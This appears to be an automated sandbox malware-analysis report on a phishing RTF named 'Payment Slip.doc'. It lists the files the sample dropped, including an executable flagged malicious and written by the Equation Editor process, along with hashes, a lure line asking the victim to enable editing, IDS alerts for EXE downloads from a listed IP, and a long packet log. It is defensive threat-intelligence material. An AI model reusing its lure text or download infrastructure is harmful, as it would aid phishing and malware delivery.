                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\lvfoxrzz.mwb.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment Slip.LNK

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Thu Sep 26 04:47:13 2024, length=628194, window=hide
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):4.5533087630184585
                                              Encrypted:false
                                              SSDEEP:24:845T/XT1SHsg4XT+c+8e72eN5Dv3qB57u:8O/XTIz4PPtB9u
                                              MD5:11A7EE368F453467A92048FD398C22E7
                                              SHA1:6C4B3F87D98DB8C0F7AC33B27F78ABD6A55E8546
                                              SHA-256:22FE3F9CE32C7F0EBFA8F4A338BA1B8F3D0CD20FF387DE7E578BF8C7CD1FFCE6
                                              SHA-512:9E779E030B651FD9C31CDA623C41BAD32B904F3A9F75EAE7563DB1CF98ED1B9970D02000C7571EC279BB851DB5CEB8BBCEC86B259400945334E0615437AE822C
                                              Malicious:false
                                              Preview:L..................F.... ...:gu.r...:gu.r...e-z.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....:Y.-..user.8......QK.X:Y.-*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2....:Y.- .PAYMEN~1.DOC..N.......WD..WD.*.........................P.a.y.m.e.n.t. .S.l.i.p...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\Payment Slip.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .S.l.i.p...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N...W...9..W.e8...8.....[D_....3N...W

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Generic INItialization configuration [folders]
                                              Category:dropped
                                              Size (bytes):58
                                              Entropy (8bit):4.728502115742624
                                              Encrypted:false
                                              SSDEEP:3:M1OeLSUA4om42eLSUA4ov:MMeNVeNy
                                              MD5:971D26B4A5D653F7806F95BBF276B3D6
                                              SHA1:4B1796FC74C1F16DF4D90D697C2CB982DDF07B97
                                              SHA-256:CFC19387886B181EA087E755F4ACD2D28D0C512B2E2828DEC088A10E319E882B
                                              SHA-512:A94EAA8EE57FB44280828A7C413A091B4F71064162CE64B7F92883BD64B77050A61F9DA62D68CF1F5281ABA8E16174D94CEFE53349C54B61F4E281269AD0E9DF
                                              Malicious:false
                                              Preview:[doc]..Payment Slip.LNK=0..[folders]..Payment Slip.LNK=0..

                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview:..

                                              C:\Users\user\AppData\Roaming\vvndewepeter91026.exe

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):704000
                                              Entropy (8bit):7.875943883609069
                                              Encrypted:false
                                              SSDEEP:12288:nqR++ZR3W83B1LViDaDHkzrmvK0eVMfNHczr9wdG7gZf0mMlJEdtTJJ:nE++Zc8NilrAKHV+NHcH9F7jmMb4
                                              MD5:42F2CE52A57E0D72EAC297A532354E42
                                              SHA1:7F2F1EF38365147865F1CEC2C1D0AD62CDC6F7D0
                                              SHA-256:516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                                              SHA-512:6BD38183780B7DC761CFEAAFB3742F17A1CEADE827FC0D815CFF8969F0FD530E4ACE5FB70754E056FED44939EF774A4F5EF4B6A7FE9EC2F4C43BB3C49D4BFEEE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$......v.... ........@.. ....................... ............@.................................$...O........ ........................................................................... ............... ..H............text...|.... ...................... ..`.rsrc.... ......."..................@..@.reloc..............................@..B................X.......H........Y..\5..........,....&...........................................0..|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}....*.0..!..........(.... l...Y m...Z..(....X.+..*....0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{

                                              C:\Users\user\Desktop\~$yment Slip.doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (50625), with CRLF, CR, LF line terminators
                                              Entropy (8bit):2.7130560779943753
                                              TrID:
                                              • Rich Text Format (4004/1) 100.00%
                                              File name:Payment Slip.doc
                                              File size:628'194 bytes
                                              MD5:56fd8f0ced26a25748989b34f051f04c
                                              SHA1:d163c3303db9ee003173fcd1082bf9381282baf8
                                              SHA256:419e260eafabf9698076436238fca33bb4c44bc1aaa02f2187d37a121ca57c80
                                              SHA512:c480f7ea8ac30bca9522add614c32135dee28caac53ff1ac52aab0c3edfdb672fa64cfd4e21c3ad1ae4b913020f27a4bffe1c79427f5a4c85db89ffc2f4854bd
                                              SSDEEP:6144:qvwAYwAYwAYwAYwAcDLI4E84ACC31NbpRyfuMjV:qui
                                              TLSH:D4D4352DD70B06599F62A3379B5B1E5545FCBA2EF38111B0346C833833EAC3992256BD
                                              File Content Preview:{\rt..{\*\fZxC5n4omR9aVJjcN6RYjp3ZKLnceFnpcouERUgimMgD71uBRcgI3GaMnVkZODKx7fL2eqerH2B6BeYbCKg2cByqOUSUSRKsSFn3WUxAYcDfSsgmvLyAEDEwPSRneZqWujmgp4gXtGJJkLLcvq47f1PY8YG}..{\253647800please click Enable editing from the yellow bar above.The independent audito

                                              File Icon

                                              Icon Hash:2764a3aaaeb7bdbf

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-26T07:47:20.416254+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.12380192.168.2.2249161TCP
                                              2024-09-26T07:47:20.634853+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.12380192.168.2.2249161TCP
                                              2024-09-26T07:47:28.134204+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162132.226.8.16980TCP
                                              2024-09-26T07:47:30.823828+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162132.226.8.16980TCP
                                              2024-09-26T07:47:31.314304+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249164188.114.96.3443TCP
                                              2024-09-26T07:47:32.212268+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249165193.122.6.16880TCP
                                              2024-09-26T07:47:33.522644+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249167158.101.44.24280TCP
                                              2024-09-26T07:47:36.928631+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249169193.122.130.080TCP
                                              2024-09-26T07:47:38.265128+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249169193.122.130.080TCP
                                              2024-09-26T07:47:39.606636+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249171132.226.247.7380TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 07:47:18.538779020 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:18.543857098 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:18.543916941 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:18.544132948 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:18.548886061 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411302090 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411328077 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411339045 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411345959 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411355972 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411366940 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411375999 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411396027 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411406994 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411417007 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.411432028 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.411478996 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.411478996 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.416254044 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.416307926 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.416344881 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.416357040 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.416362047 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.416397095 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.419986963 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.499872923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.500009060 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558341026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558361053 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558382988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558394909 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558404922 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558465004 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558465004 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558531046 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558543921 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558568954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558573008 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558581114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558588028 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558603048 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558610916 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.558619976 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.558645010 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.559473038 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.559485912 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.559503078 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.559521914 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.559526920 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.559545040 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.559571981 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.559571981 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.559581041 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.560231924 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.560250998 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.560271978 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.560271978 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.560286999 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.560303926 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.560309887 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.560326099 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.560345888 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.560363054 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.561096907 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.561115026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.561140060 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.561152935 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.561153889 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.561170101 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.561192036 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.561213017 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.634852886 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.634875059 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.635013103 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.703660965 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.703682899 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.703706026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.703718901 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.703736067 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.703737974 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.703778982 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.703778982 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.703788996 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.703800917 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.703830957 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.703840971 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.704199076 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704211950 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704231977 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704242945 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704250097 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.704262018 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704267979 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.704283953 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.704293966 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.704734087 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704783916 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.704822063 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704864025 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.704865932 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.704900026 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.705163956 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705174923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705210924 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.705332994 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705377102 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705380917 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.705391884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705413103 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705418110 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.705427885 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705437899 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.705451012 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.705461025 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.705462933 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.705502033 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.706278086 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.706321001 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.706326008 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.706334114 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.706362963 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.706367016 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.706378937 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.706398964 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.706403971 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.706434011 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.707164049 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.707175970 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.707195997 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.707209110 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.707214117 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.707226992 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.707233906 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.707245111 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.707251072 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.707267046 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.707283974 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.708082914 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.708093882 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.708122969 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.708132029 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.708132029 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.708153963 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.708158016 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.708168030 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.708170891 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.708194017 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.708204985 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.709100008 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.709115982 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.709130049 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.709145069 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.709151030 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.709163904 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.709178925 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.709178925 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.709183931 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.709197044 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.709213972 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.723342896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.723356962 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.723371029 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.723414898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.723424911 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.723427057 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.723459959 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.723473072 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:20.853334904 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.853353024 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.853377104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:20.853578091 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001035929 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001056910 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001069069 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001218081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001415968 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001426935 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001449108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001491070 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001491070 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001509905 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001522064 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001549006 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001558065 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001564980 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001578093 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001591921 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001597881 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001607895 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001619101 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001620054 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001631021 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001636982 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001657009 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001662970 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001672029 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001691103 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001699924 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001713991 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001739025 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.001780987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001791954 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.001811981 CEST804916166.63.187.123192.168.2.22
